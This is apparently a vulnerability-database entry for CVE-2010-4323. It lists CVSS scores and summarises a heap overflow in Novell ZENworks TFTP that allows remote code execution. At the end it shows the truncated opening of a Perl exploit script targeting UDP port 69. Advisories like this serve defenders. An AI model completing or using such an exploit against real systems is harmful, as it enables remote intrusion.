7.5
CVSSv2

CVE-2010-4323

Published: 19/02/2011 Updated: 10/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Heap-based buffer overflow in novell-tftp.exe in Novell ZENworks Configuration Manager (ZCM) 10.3.1, 10.3.2, and 11.0, and previous versions versions, allows remote malicious users to execute arbitrary code via a long TFTP request.

Vulnerable Product Search on Vulmon Subscribe to Product

novell zenworks configuration manager 10.3.2

novell zenworks configuration manager

novell zenworks configuration manager 10.3.1

Exploits

#!/usr/bin/perl ## Source: ## wwwprotekresearchlabcom/indexphp?option=com_content&view=article&id=22&Itemid=22 use Getopt::Std; use IO::Socket::INET; $SIG{INT} = \&abort; my $host = '19216810024'; my $port = 69; my $proto = 'udp'; my $sockType = SOCK_DGRAM; my $timeout = 1; my %opt; my $opt_string = 'hH:P:t:'; ...